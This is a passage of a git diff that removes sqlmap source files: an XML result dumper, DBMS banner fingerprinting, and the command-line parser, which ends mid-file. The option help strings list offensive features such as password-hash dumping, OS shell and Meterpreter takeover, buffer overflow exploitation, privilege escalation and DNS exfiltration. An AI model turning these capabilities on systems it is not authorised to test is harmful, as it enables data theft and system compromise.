self._addToRoot(columnsElem) - - def dbTableValues(self, tableValues): - ''' - Adds the values of specific table to the xml. - The values are organized according to the relevant row and column. 
- ''' - tableElem = self.__doc.createElement(DB_TABLE_VALUES_ELEM_NAME) - if (tableValues is not None): - db = tableValues["__infos__"]["db"] - if not db: - db = "All" - table = tableValues["__infos__"]["table"] - - count = int(tableValues["__infos__"]["count"]) - columns = tableValues.keys() - columns.sort(key=lambda x: x.lower()) - - tableElem.setAttributeNode(self._createAttribute(DB_ATTR, db)) - tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table)) - - for i in range(count): - rowElem = self.__doc.createElement(ROW_ELEM_NAME) - tableElem.appendChild(rowElem) - for column in columns: - if column != "__infos__": - info = tableValues[column] - value = info["values"][i] - - if re.search("^[\ *]*$", value): - value = "NULL" - - cellElem = self.__doc.createElement(CELL_ELEM_NAME) - cellElem.setAttributeNode(self._createAttribute(COLUMN_ATTR, column)) - cellElem.appendChild(self._createTextNode(value)) - rowElem.appendChild(cellElem) - - dbValuesElem = self._getRootChild(DB_VALUES_ELEM) - if (not(dbValuesElem)): - dbValuesElem = self.__doc.createElement(DB_VALUES_ELEM) - self._addToRoot(dbValuesElem) - - dbValuesElem.appendChild(tableElem) - - logger.info("Table '%s.%s' dumped to XML file" % (db, table)) - - def dbColumns(self, dbColumns, colConsider, dbs): - ''' - Adds information about the columns - ''' - for column in dbColumns.keys(): - printDbs = {} - for db, tblData in dbs.items(): - for tbl, colData in tblData.items(): - for col, dataType in colData.items(): - if column in col: - if db in printDbs: - if tbl in printDbs[db]: - printDbs[db][tbl][col] = dataType - else: - printDbs[db][tbl] = {col: dataType} - else: - printDbs[db] = {} - printDbs[db][tbl] = {col: dataType} - - continue - - self.dbTableColumns(printDbs) - - def query(self, query, queryRes): - ''' - Adds details of an executed query to the xml. - The query details are the query itself and its results. 
- ''' - queryElem = self.__doc.createElement(QUERY_ELEM_NAME) - queryElem.setAttributeNode(self._createAttribute(VALUE_ATTR, query)) - queryElem.appendChild(self._createTextNode(queryRes)) - queriesElem = self._getRootChild(QUERIES_ELEM_NAME) - if (not(queriesElem)): - queriesElem = self.__doc.createElement(QUERIES_ELEM_NAME) - self._addToRoot(queriesElem) - queriesElem.appendChild(queryElem) - - def registerValue(self, registerData): - ''' - Adds information about an extracted registry key to the xml - ''' - registerElem = self.__doc.createElement(REGISTER_DATA_ELEM_NAME) - registerElem.appendChild(self._createTextNode(registerData)) - registriesElem = self._getRootChild(REGISTERY_ENTRIES_ELEM_NAME) - if (not(registriesElem)): - registriesElem = self.__doc.createElement(REGISTERY_ENTRIES_ELEM_NAME) - self._addToRoot(registriesElem) - registriesElem.appendChild(registerElem) - - def rFile(self, filePath, data): - ''' - Adds an extracted file's content to the xml - ''' - fileContentElem = self.__doc.createElement(FILE_CONTENT_ELEM_NAME) - fileContentElem.setAttributeNode(self._createAttribute(NAME_ATTR, filePath)) - fileContentElem.appendChild(self._createTextNode(data)) - self._addToRoot(fileContentElem) - - def setOutputFile(self): - ''' - Initiates the xml file from the configuration. 
- ''' - if (conf.xmlFile): - try: - self._outputFile = conf.xmlFile - self.__root = None - - if os.path.exists(self._outputFile): - try: - self.__doc = xml.dom.minidom.parse(self._outputFile) - self.__root = self.__doc.childNodes[0] - except ExpatError: - self.__doc = Document() - - self._outputFP = codecs.open(self._outputFile, "w+", UNICODE_ENCODING) - - if self.__root is None: - self.__root = self.__doc.createElementNS(NAME_SPACE_ATTR, RESULTS_ELEM_NAME) - self.__root.setAttributeNode(self._createAttribute(XMLNS_ATTR, NAME_SPACE_ATTR)) - self.__root.setAttributeNode(self._createAttribute(SCHEME_NAME_ATTR, SCHEME_NAME)) - self.__doc.appendChild(self.__root) - except IOError: - raise SqlmapFilePathException("Wrong filename provided for saving the xml file: %s" % conf.xmlFile) - - def getOutputFile(self): - return self._outputFile - - def finish(self, resultStatus, resultMsg=""): - ''' - Finishes the dumper operation: - 1. Adds the session status to the xml - 2. Writes the xml to the file - 3. 
Closes the xml file - ''' - if ((self._outputFP is not None) and not(self._outputFP.closed)): - statusElem = self.__doc.createElement(STATUS_ELEM_NAME) - statusElem.setAttributeNode(self._createAttribute(SUCESS_ATTR, getUnicode(resultStatus))) - - if not resultStatus: - errorElem = self.__doc.createElement(ERROR_ELEM_NAME) - - if isinstance(resultMsg, Exception): - errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, type(resultMsg).__name__)) - else: - errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNHANDLED_PROBLEM_TYPE)) - - errorElem.appendChild(self._createTextNode(getUnicode(resultMsg))) - statusElem.appendChild(errorElem) - - self._addToRoot(statusElem) - self.__write(prettyprint.formatXML(self.__doc, encoding=UNICODE_ENCODING)) - self._outputFP.close() - - -def closeDumper(status, msg=""): - """ - Closes the dumper of the session - """ - - if hasattr(conf, "dumper") and hasattr(conf.dumper, "finish"): - conf.dumper.finish(status, msg) - -dumper = XMLDump() diff --git a/lib/parse/__init__.py b/lib/parse/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/parse/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/parse/banner.py b/lib/parse/banner.py deleted file mode 100644 index 422378e0..00000000 --- a/lib/parse/banner.py +++ /dev/null @@ -1,115 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from xml.sax.handler import ContentHandler - -from lib.core.common import Backend -from lib.core.common import parseXmlFile -from lib.core.common import sanitizeStr -from lib.core.data import kb -from lib.core.data import paths -from lib.core.enums import DBMS -from lib.parse.handler import FingerprintHandler - -class 
MSSQLBannerHandler(ContentHandler): - """ - This class defines methods to parse and extract information from the - given Microsoft SQL Server banner based upon the data in XML file - """ - - def __init__(self, banner, info): - ContentHandler.__init__(self) - - self._banner = sanitizeStr(banner) - self._inVersion = False - self._inServicePack = False - self._release = None - self._version = "" - self._versionAlt = None - self._servicePack = "" - self._info = info - - def _feedInfo(self, key, value): - value = sanitizeStr(value) - - if value in (None, "None"): - return - - self._info[key] = value - - def startElement(self, name, attrs): - if name == "signatures": - self._release = sanitizeStr(attrs.get("release")) - - elif name == "version": - self._inVersion = True - - elif name == "servicepack": - self._inServicePack = True - - def characters(self, data): - if self._inVersion: - self._version += sanitizeStr(data) - elif self._inServicePack: - self._servicePack += sanitizeStr(data) - - def endElement(self, name): - if name == "signature": - for version in (self._version, self._versionAlt): - if version and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner): - self._feedInfo("dbmsRelease", self._release) - self._feedInfo("dbmsVersion", self._version) - self._feedInfo("dbmsServicePack", self._servicePack) - break - - self._version = "" - self._versionAlt = None - self._servicePack = "" - - elif name == "version": - self._inVersion = False - self._version = self._version.replace(" ", "") - - match = re.search(r"\A(?P\d+)\.00\.(?P\d+)\Z", self._version) - self._versionAlt = "%s.0.%s.0" % (match.group('major'), match.group('build')) if match else None - - elif name == "servicepack": - self._inServicePack = False - self._servicePack = self._servicePack.replace(" ", "") - -def bannerParser(banner): - """ - This function calls a class to extract information from the given - DBMS banner based upon the data in XML file - """ - - xmlfile = None - - if 
Backend.isDbms(DBMS.MSSQL): - xmlfile = paths.MSSQL_XML - elif Backend.isDbms(DBMS.MYSQL): - xmlfile = paths.MYSQL_XML - elif Backend.isDbms(DBMS.ORACLE): - xmlfile = paths.ORACLE_XML - elif Backend.isDbms(DBMS.PGSQL): - xmlfile = paths.PGSQL_XML - - if not xmlfile: - return - - if Backend.isDbms(DBMS.MSSQL): - handler = MSSQLBannerHandler(banner, kb.bannerFp) - parseXmlFile(xmlfile, handler) - - handler = FingerprintHandler(banner, kb.bannerFp) - parseXmlFile(paths.GENERIC_XML, handler) - else: - handler = FingerprintHandler(banner, kb.bannerFp) - parseXmlFile(xmlfile, handler) - parseXmlFile(paths.GENERIC_XML, handler) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py deleted file mode 100644 index 363fb517..00000000 --- a/lib/parse/cmdline.py +++ /dev/null @@ -1,954 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re -import shlex -import sys - -from optparse import OptionError -from optparse import OptionGroup -from optparse import OptionParser -from optparse import SUPPRESS_HELP - -from lib.core.common import checkDeprecatedOptions -from lib.core.common import checkSystemEncoding -from lib.core.common import expandMnemonics -from lib.core.common import getUnicode -from lib.core.data import cmdLineOptions -from lib.core.data import conf -from lib.core.data import logger -from lib.core.defaults import defaults -from lib.core.enums import AUTOCOMPLETE_TYPE -from lib.core.exception import SqlmapShellQuitException -from lib.core.exception import SqlmapSyntaxException -from lib.core.settings import BASIC_HELP_ITEMS -from lib.core.settings import DUMMY_URL -from lib.core.settings import IS_WIN -from lib.core.settings import MAX_HELP_OPTION_LENGTH -from lib.core.settings import VERSION_STRING -from lib.core.shell import autoCompletion -from lib.core.shell import clearHistory -from lib.core.shell import loadHistory -from 
lib.core.shell import saveHistory - -def cmdLineParser(argv=None): - """ - This function parses the command line parameters and arguments - """ - - if not argv: - argv = sys.argv - - checkSystemEncoding() - - _ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding()) - - usage = "%s%s [options]" % ("python " if not IS_WIN else "", \ - "\"%s\"" % _ if " " in _ else _) - - parser = OptionParser(usage=usage) - - try: - parser.add_option("--hh", dest="advancedHelp", - action="store_true", - help="Show advanced help message and exit") - - parser.add_option("--version", dest="showVersion", - action="store_true", - help="Show program's version number and exit") - - parser.add_option("-v", dest="verbose", type="int", - help="Verbosity level: 0-6 (default %d)" % defaults.verbose) - - # Target options - target = OptionGroup(parser, "Target", "At least one of these " - "options has to be provided to define the target(s)") - - target.add_option("-d", dest="direct", help="Connection string " - "for direct database connection") - - target.add_option("-u", "--url", dest="url", help="Target URL (e.g. 
\"http://www.site.com/vuln.php?id=1\")") - - target.add_option("-l", dest="logFile", help="Parse target(s) from Burp " - "or WebScarab proxy log file") - - target.add_option("-x", dest="sitemapUrl", help="Parse target(s) from remote sitemap(.xml) file") - - target.add_option("-m", dest="bulkFile", help="Scan multiple targets given " - "in a textual file ") - - target.add_option("-r", dest="requestFile", - help="Load HTTP request from a file") - - target.add_option("-g", dest="googleDork", - help="Process Google dork results as target URLs") - - target.add_option("-c", dest="configFile", - help="Load options from a configuration INI file") - - # Request options - request = OptionGroup(parser, "Request", "These options can be used " - "to specify how to connect to the target URL") - - request.add_option("--method", dest="method", - help="Force usage of given HTTP method (e.g. PUT)") - - request.add_option("--data", dest="data", - help="Data string to be sent through POST") - - request.add_option("--param-del", dest="paramDel", - help="Character used for splitting parameter values") - - request.add_option("--cookie", dest="cookie", - help="HTTP Cookie header value") - - request.add_option("--cookie-del", dest="cookieDel", - help="Character used for splitting cookie values") - - request.add_option("--load-cookies", dest="loadCookies", - help="File containing cookies in Netscape/wget format") - - request.add_option("--drop-set-cookie", dest="dropSetCookie", - action="store_true", - help="Ignore Set-Cookie header from response") - - request.add_option("--user-agent", dest="agent", - help="HTTP User-Agent header value") - - request.add_option("--random-agent", dest="randomAgent", - action="store_true", - help="Use randomly selected HTTP User-Agent header value") - - request.add_option("--host", dest="host", - help="HTTP Host header value") - - request.add_option("--referer", dest="referer", - help="HTTP Referer header value") - - request.add_option("-H", "--header", 
dest="header", - help="Extra header (e.g. \"X-Forwarded-For: 127.0.0.1\")") - - request.add_option("--headers", dest="headers", - help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") - - request.add_option("--auth-type", dest="authType", - help="HTTP authentication type " - "(Basic, Digest, NTLM or PKI)") - - request.add_option("--auth-cred", dest="authCred", - help="HTTP authentication credentials " - "(name:password)") - - request.add_option("--auth-file", dest="authFile", - help="HTTP authentication PEM cert/private key file") - - request.add_option("--ignore-401", dest="ignore401", action="store_true", - help="Ignore HTTP Error 401 (Unauthorized)") - - request.add_option("--proxy", dest="proxy", - help="Use a proxy to connect to the target URL") - - request.add_option("--proxy-cred", dest="proxyCred", - help="Proxy authentication credentials " - "(name:password)") - - request.add_option("--proxy-file", dest="proxyFile", - help="Load proxy list from a file") - - request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", - help="Ignore system default proxy settings") - - request.add_option("--tor", dest="tor", - action="store_true", - help="Use Tor anonymity network") - - request.add_option("--tor-port", dest="torPort", - help="Set Tor proxy port other than default") - - request.add_option("--tor-type", dest="torType", - help="Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)") - - request.add_option("--check-tor", dest="checkTor", - action="store_true", - help="Check to see if Tor is used properly") - - request.add_option("--delay", dest="delay", type="float", - help="Delay in seconds between each HTTP request") - - request.add_option("--timeout", dest="timeout", type="float", - help="Seconds to wait before timeout connection " - "(default %d)" % defaults.timeout) - - request.add_option("--retries", dest="retries", type="int", - help="Retries when the connection timeouts " - "(default %d)" % defaults.retries) - - 
request.add_option("--randomize", dest="rParam", - help="Randomly change value for given parameter(s)") - - request.add_option("--safe-url", dest="safeUrl", - help="URL address to visit frequently during testing") - - request.add_option("--safe-post", dest="safePost", - help="POST data to send to a safe URL") - - request.add_option("--safe-req", dest="safeReqFile", - help="Load safe HTTP request from a file") - - request.add_option("--safe-freq", dest="safeFreq", type="int", - help="Test requests between two visits to a given safe URL") - - request.add_option("--skip-urlencode", dest="skipUrlEncode", - action="store_true", - help="Skip URL encoding of payload data") - - request.add_option("--csrf-token", dest="csrfToken", - help="Parameter used to hold anti-CSRF token") - - request.add_option("--csrf-url", dest="csrfUrl", - help="URL address to visit to extract anti-CSRF token") - - request.add_option("--force-ssl", dest="forceSSL", - action="store_true", - help="Force usage of SSL/HTTPS") - - request.add_option("--hpp", dest="hpp", - action="store_true", - help="Use HTTP parameter pollution method") - - request.add_option("--eval", dest="evalCode", - help="Evaluate provided Python code before the request (e.g. 
\"import hashlib;id2=hashlib.md5(id).hexdigest()\")") - - # Optimization options - optimization = OptionGroup(parser, "Optimization", "These " - "options can be used to optimize the " - "performance of sqlmap") - - optimization.add_option("-o", dest="optimize", - action="store_true", - help="Turn on all optimization switches") - - optimization.add_option("--predict-output", dest="predictOutput", action="store_true", - help="Predict common queries output") - - optimization.add_option("--keep-alive", dest="keepAlive", action="store_true", - help="Use persistent HTTP(s) connections") - - optimization.add_option("--null-connection", dest="nullConnection", action="store_true", - help="Retrieve page length without actual HTTP response body") - - optimization.add_option("--threads", dest="threads", type="int", - help="Max number of concurrent HTTP(s) " - "requests (default %d)" % defaults.threads) - - # Injection options - injection = OptionGroup(parser, "Injection", "These options can be " - "used to specify which parameters to test " - "for, provide custom injection payloads and " - "optional tampering scripts") - - injection.add_option("-p", dest="testParameter", - help="Testable parameter(s)") - - injection.add_option("--skip", dest="skip", - help="Skip testing for given parameter(s)") - - injection.add_option("--skip-static", dest="skipStatic", action="store_true", - help="Skip testing parameters that not appear dynamic") - - injection.add_option("--dbms", dest="dbms", - help="Force back-end DBMS to this value") - - injection.add_option("--dbms-cred", dest="dbmsCred", - help="DBMS authentication credentials (user:password)") - - injection.add_option("--os", dest="os", - help="Force back-end DBMS operating system " - "to this value") - - injection.add_option("--invalid-bignum", dest="invalidBignum", - action="store_true", - help="Use big numbers for invalidating values") - - injection.add_option("--invalid-logical", dest="invalidLogical", - action="store_true", - 
help="Use logical operations for invalidating values") - - injection.add_option("--invalid-string", dest="invalidString", - action="store_true", - help="Use random strings for invalidating values") - - injection.add_option("--no-cast", dest="noCast", - action="store_true", - help="Turn off payload casting mechanism") - - injection.add_option("--no-escape", dest="noEscape", - action="store_true", - help="Turn off string escaping mechanism") - - injection.add_option("--prefix", dest="prefix", - help="Injection payload prefix string") - - injection.add_option("--suffix", dest="suffix", - help="Injection payload suffix string") - - injection.add_option("--tamper", dest="tamper", - help="Use given script(s) for tampering injection data") - - # Detection options - detection = OptionGroup(parser, "Detection", "These options can be " - "used to customize the detection phase") - - detection.add_option("--level", dest="level", type="int", - help="Level of tests to perform (1-5, " - "default %d)" % defaults.level) - - detection.add_option("--risk", dest="risk", type="int", - help="Risk of tests to perform (1-3, " - "default %d)" % defaults.level) - - detection.add_option("--string", dest="string", - help="String to match when " - "query is evaluated to True") - - detection.add_option("--not-string", dest="notString", - help="String to match when " - "query is evaluated to False") - - detection.add_option("--regexp", dest="regexp", - help="Regexp to match when " - "query is evaluated to True") - - detection.add_option("--code", dest="code", type="int", - help="HTTP code to match when " - "query is evaluated to True") - - detection.add_option("--text-only", dest="textOnly", - action="store_true", - help="Compare pages based only on the textual content") - - detection.add_option("--titles", dest="titles", - action="store_true", - help="Compare pages based only on their titles") - - # Techniques options - techniques = OptionGroup(parser, "Techniques", "These options can be " - 
"used to tweak testing of specific SQL " - "injection techniques") - - techniques.add_option("--technique", dest="tech", - help="SQL injection techniques to use " - "(default \"%s\")" % defaults.tech) - - techniques.add_option("--time-sec", dest="timeSec", - type="int", - help="Seconds to delay the DBMS response " - "(default %d)" % defaults.timeSec) - - techniques.add_option("--union-cols", dest="uCols", - help="Range of columns to test for UNION query SQL injection") - - techniques.add_option("--union-char", dest="uChar", - help="Character to use for bruteforcing number of columns") - - techniques.add_option("--union-from", dest="uFrom", - help="Table to use in FROM part of UNION query SQL injection") - - techniques.add_option("--dns-domain", dest="dnsName", - help="Domain name used for DNS exfiltration attack") - - techniques.add_option("--second-order", dest="secondOrder", - help="Resulting page URL searched for second-order " - "response") - - # Fingerprint options - fingerprint = OptionGroup(parser, "Fingerprint") - - fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", - action="store_true", - help="Perform an extensive DBMS version fingerprint") - - # Enumeration options - enumeration = OptionGroup(parser, "Enumeration", "These options can " - "be used to enumerate the back-end database " - "management system information, structure " - "and data contained in the tables. 
Moreover " - "you can run your own SQL statements") - - enumeration.add_option("-a", "--all", dest="getAll", - action="store_true", help="Retrieve everything") - - enumeration.add_option("-b", "--banner", dest="getBanner", - action="store_true", help="Retrieve DBMS banner") - - enumeration.add_option("--current-user", dest="getCurrentUser", - action="store_true", - help="Retrieve DBMS current user") - - enumeration.add_option("--current-db", dest="getCurrentDb", - action="store_true", - help="Retrieve DBMS current database") - - enumeration.add_option("--hostname", dest="getHostname", - action="store_true", - help="Retrieve DBMS server hostname") - - enumeration.add_option("--is-dba", dest="isDba", - action="store_true", - help="Detect if the DBMS current user is DBA") - - enumeration.add_option("--users", dest="getUsers", action="store_true", - help="Enumerate DBMS users") - - enumeration.add_option("--passwords", dest="getPasswordHashes", - action="store_true", - help="Enumerate DBMS users password hashes") - - enumeration.add_option("--privileges", dest="getPrivileges", - action="store_true", - help="Enumerate DBMS users privileges") - - enumeration.add_option("--roles", dest="getRoles", - action="store_true", - help="Enumerate DBMS users roles") - - enumeration.add_option("--dbs", dest="getDbs", action="store_true", - help="Enumerate DBMS databases") - - enumeration.add_option("--tables", dest="getTables", action="store_true", - help="Enumerate DBMS database tables") - - enumeration.add_option("--columns", dest="getColumns", action="store_true", - help="Enumerate DBMS database table columns") - - enumeration.add_option("--schema", dest="getSchema", action="store_true", - help="Enumerate DBMS schema") - - enumeration.add_option("--count", dest="getCount", action="store_true", - help="Retrieve number of entries for table(s)") - - enumeration.add_option("--dump", dest="dumpTable", action="store_true", - help="Dump DBMS database table entries") - - 
enumeration.add_option("--dump-all", dest="dumpAll", action="store_true", - help="Dump all DBMS databases tables entries") - - enumeration.add_option("--search", dest="search", action="store_true", - help="Search column(s), table(s) and/or database name(s)") - - enumeration.add_option("--comments", dest="getComments", action="store_true", - help="Retrieve DBMS comments") - - enumeration.add_option("-D", dest="db", - help="DBMS database to enumerate") - - enumeration.add_option("-T", dest="tbl", - help="DBMS database table(s) to enumerate") - - enumeration.add_option("-C", dest="col", - help="DBMS database table column(s) to enumerate") - - enumeration.add_option("-X", dest="excludeCol", - help="DBMS database table column(s) to not enumerate") - - enumeration.add_option("-U", dest="user", - help="DBMS user to enumerate") - - enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", - action="store_true", - help="Exclude DBMS system databases when " - "enumerating tables") - - enumeration.add_option("--where", dest="dumpWhere", - help="Use WHERE condition while table dumping") - - enumeration.add_option("--start", dest="limitStart", type="int", - help="First query output entry to retrieve") - - enumeration.add_option("--stop", dest="limitStop", type="int", - help="Last query output entry to retrieve") - - enumeration.add_option("--first", dest="firstChar", type="int", - help="First query output word character to retrieve") - - enumeration.add_option("--last", dest="lastChar", type="int", - help="Last query output word character to retrieve") - - enumeration.add_option("--sql-query", dest="query", - help="SQL statement to be executed") - - enumeration.add_option("--sql-shell", dest="sqlShell", - action="store_true", - help="Prompt for an interactive SQL shell") - - enumeration.add_option("--sql-file", dest="sqlFile", - help="Execute SQL statements from given file(s)") - - # Brute force options - brute = OptionGroup(parser, "Brute force", "These " - "options can 
be used to run brute force " - "checks") - - brute.add_option("--common-tables", dest="commonTables", action="store_true", - help="Check existence of common tables") - - brute.add_option("--common-columns", dest="commonColumns", action="store_true", - help="Check existence of common columns") - - # User-defined function options - udf = OptionGroup(parser, "User-defined function injection", "These " - "options can be used to create custom user-defined " - "functions") - - udf.add_option("--udf-inject", dest="udfInject", action="store_true", - help="Inject custom user-defined functions") - - udf.add_option("--shared-lib", dest="shLib", - help="Local path of the shared library") - - # File system options - filesystem = OptionGroup(parser, "File system access", "These options " - "can be used to access the back-end database " - "management system underlying file system") - - filesystem.add_option("--file-read", dest="rFile", - help="Read a file from the back-end DBMS " - "file system") - - filesystem.add_option("--file-write", dest="wFile", - help="Write a local file on the back-end " - "DBMS file system") - - filesystem.add_option("--file-dest", dest="dFile", - help="Back-end DBMS absolute filepath to " - "write to") - - # Takeover options - takeover = OptionGroup(parser, "Operating system access", "These " - "options can be used to access the back-end " - "database management system underlying " - "operating system") - - takeover.add_option("--os-cmd", dest="osCmd", - help="Execute an operating system command") - - takeover.add_option("--os-shell", dest="osShell", - action="store_true", - help="Prompt for an interactive operating " - "system shell") - - takeover.add_option("--os-pwn", dest="osPwn", - action="store_true", - help="Prompt for an OOB shell, " - "Meterpreter or VNC") - - takeover.add_option("--os-smbrelay", dest="osSmb", - action="store_true", - help="One click prompt for an OOB shell, " - "Meterpreter or VNC") - - takeover.add_option("--os-bof", 
dest="osBof", - action="store_true", - help="Stored procedure buffer overflow " - "exploitation") - - takeover.add_option("--priv-esc", dest="privEsc", - action="store_true", - help="Database process user privilege escalation") - - takeover.add_option("--msf-path", dest="msfPath", - help="Local path where Metasploit Framework " - "is installed") - - takeover.add_option("--tmp-path", dest="tmpPath", - help="Remote absolute path of temporary files " - "directory") - - # Windows registry options - windows = OptionGroup(parser, "Windows registry access", "These " - "options can be used to access the back-end " - "database management system Windows " - "registry") - - windows.add_option("--reg-read", dest="regRead", - action="store_true", - help="Read a Windows registry key value") - - windows.add_option("--reg-add", dest="regAdd", - action="store_true", - help="Write a Windows registry key value data") - - windows.add_option("--reg-del", dest="regDel", - action="store_true", - help="Delete a Windows registry key value") - - windows.add_option("--reg-key", dest="regKey", - help="Windows registry key") - - windows.add_option("--reg-value", dest="regVal", - help="Windows registry key value") - - windows.add_option("--reg-data", dest="regData", - help="Windows registry key value data") - - windows.add_option("--reg-type", dest="regType", - help="Windows registry key value type") - - # General options - general = OptionGroup(parser, "General", "These options can be used " - "to set some general working parameters") - - #general.add_option("-x", dest="xmlFile", - # help="Dump the data into an XML file") - - general.add_option("-s", dest="sessionFile", - help="Load session from a stored (.sqlite) file") - - general.add_option("-t", dest="trafficFile", - help="Log all HTTP traffic into a " - "textual file") - - general.add_option("--batch", dest="batch", - action="store_true", - help="Never ask for user input, use the default behaviour") - - general.add_option("--charset", 
dest="charset", - help="Force character encoding used for data retrieval") - - general.add_option("--crawl", dest="crawlDepth", type="int", - help="Crawl the website starting from the target URL") - - general.add_option("--crawl-exclude", dest="crawlExclude", - help="Regexp to exclude pages from crawling (e.g. \"logout\")") - - general.add_option("--csv-del", dest="csvDel", - help="Delimiting character used in CSV output " - "(default \"%s\")" % defaults.csvDel) - - general.add_option("--dump-format", dest="dumpFormat", - help="Format of dumped data (CSV (default), HTML or SQLITE)") - - general.add_option("--eta", dest="eta", - action="store_true", - help="Display for each output the " - "estimated time of arrival") - - general.add_option("--flush-session", dest="flushSession", - action="store_true", - help="Flush session files for current target") - - general.add_option("--forms", dest="forms", - action="store_true", - help="Parse and test forms on target URL") - - general.add_option("--fresh-queries", dest="freshQueries", - action="store_true", - help="Ignore query results stored in session file") - - general.add_option("--hex", dest="hexConvert", - action="store_true", - help="Use DBMS hex function(s) for data retrieval") - - general.add_option("--output-dir", dest="outputDir", - action="store", - help="Custom output directory path") - - general.add_option("--parse-errors", dest="parseErrors", - action="store_true", - help="Parse and display DBMS error messages from responses") - - general.add_option("--pivot-column", dest="pivotColumn", - help="Pivot column name") - - general.add_option("--save", dest="saveConfig", - help="Save options to a configuration INI file") - - general.add_option("--scope", dest="scope", - help="Regexp to filter targets from provided proxy log") - - general.add_option("--test-filter", dest="testFilter", - help="Select tests by payloads and/or titles (e.g. 
ROW)") - - general.add_option("--test-skip", dest="testSkip", - help="Skip tests by payloads and/or titles (e.g. BENCHMARK)") - - general.add_option("--update", dest="updateAll", - action="store_true", - help="Update sqlmap") - - # Miscellaneous options - miscellaneous = OptionGroup(parser, "Miscellaneous") - - miscellaneous.add_option("-z", dest="mnemonics", - help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") - - miscellaneous.add_option("--alert", dest="alert", - help="Run host OS command(s) when SQL injection is found") - - miscellaneous.add_option("--answers", dest="answers", - help="Set question answers (e.g. \"quit=N,follow=N\")") - - miscellaneous.add_option("--beep", dest="beep", action="store_true", - help="Beep on question and/or when SQL injection is found") - - miscellaneous.add_option("--cleanup", dest="cleanup", - action="store_true", - help="Clean up the DBMS from sqlmap specific " - "UDF and tables") - - miscellaneous.add_option("--dependencies", dest="dependencies", - action="store_true", - help="Check for missing (non-core) sqlmap dependencies") - - miscellaneous.add_option("--disable-coloring", dest="disableColoring", - action="store_true", - help="Disable console output coloring") - - miscellaneous.add_option("--gpage", dest="googlePage", type="int", - help="Use Google dork results from specified page number") - - miscellaneous.add_option("--identify-waf", dest="identifyWaf", - action="store_true", - help="Make a thorough testing for a WAF/IPS/IDS protection") - - miscellaneous.add_option("--skip-waf", dest="skipWaf", - action="store_true", - help="Skip heuristic detection of WAF/IPS/IDS protection") - - miscellaneous.add_option("--mobile", dest="mobile", - action="store_true", - help="Imitate smartphone through HTTP User-Agent header") - - miscellaneous.add_option("--offline", dest="offline", - action="store_true", - help="Work in offline mode (only use session data)") - - miscellaneous.add_option("--page-rank", dest="pageRank", - 
action="store_true", - help="Display page rank (PR) for Google dork results") - - miscellaneous.add_option("--purge-output", dest="purgeOutput", - action="store_true", - help="Safely remove all content from output directory") - - miscellaneous.add_option("--smart", dest="smart", - action="store_true", - help="Conduct thorough tests only if positive heuristic(s)") - - miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true", - help="Prompt for an interactive sqlmap shell") - - miscellaneous.add_option("--wizard", dest="wizard", - action="store_true", - help="Simple wizard interface for beginner users") - - # Hidden and/or experimental options - parser.add_option("--dummy", dest="dummy", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--pickled-options", dest="pickledOptions", - help=SUPPRESS_HELP) - - parser.add_option("--disable-precon", dest="disablePrecon", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--profile", dest="profile", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--binary-fields", dest="binaryFields", - help=SUPPRESS_HELP) - - parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int", - help=SUPPRESS_HELP) - - parser.add_option("--force-dns", dest="forceDns", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--force-threads", dest="forceThreads", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--smoke-test", dest="smokeTest", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--live-test", dest="liveTest", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--stop-fail", dest="stopFail", action="store_true", - help=SUPPRESS_HELP) - - parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP) - - parser.add_option_group(target) - parser.add_option_group(request) - parser.add_option_group(optimization) - parser.add_option_group(injection) - parser.add_option_group(detection) - 
parser.add_option_group(techniques) - parser.add_option_group(fingerprint) - parser.add_option_group(enumeration) - parser.add_option_group(brute) - parser.add_option_group(udf) - parser.add_option_group(filesystem) - parser.add_option_group(takeover) - parser.add_option_group(windows) - parser.add_option_group(general) - parser.add_option_group(miscellaneous) - - # Dirty hack to display longer options without breaking into two lines - def _(self, *args): - retVal = parser.formatter._format_option_strings(*args) - if len(retVal) > MAX_HELP_OPTION_LENGTH: - retVal = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % retVal - return retVal - - parser.formatter._format_option_strings = parser.formatter.format_option_strings - parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser, type(parser)) - - # Dirty hack for making a short option -hh - option = parser.get_option("--hh") - option._short_opts = ["-hh"] - option._long_opts = [] - - # Dirty hack for inherent help message of switch -h - option = parser.get_option("-h") - option.help = option.help.capitalize().replace("this help", "basic help") - - _ = [] - prompt = False - advancedHelp = True - extraHeaders = [] - - for arg in argv: - _.append(getUnicode(arg, encoding=sys.getfilesystemencoding())) - - argv = _ - checkDeprecatedOptions(argv) - - prompt = "--sqlmap-shell" in argv - - if prompt: - parser.usage = "" - cmdLineOptions.sqlmapShell = True - - _ = ["x", "q", "exit", "quit", 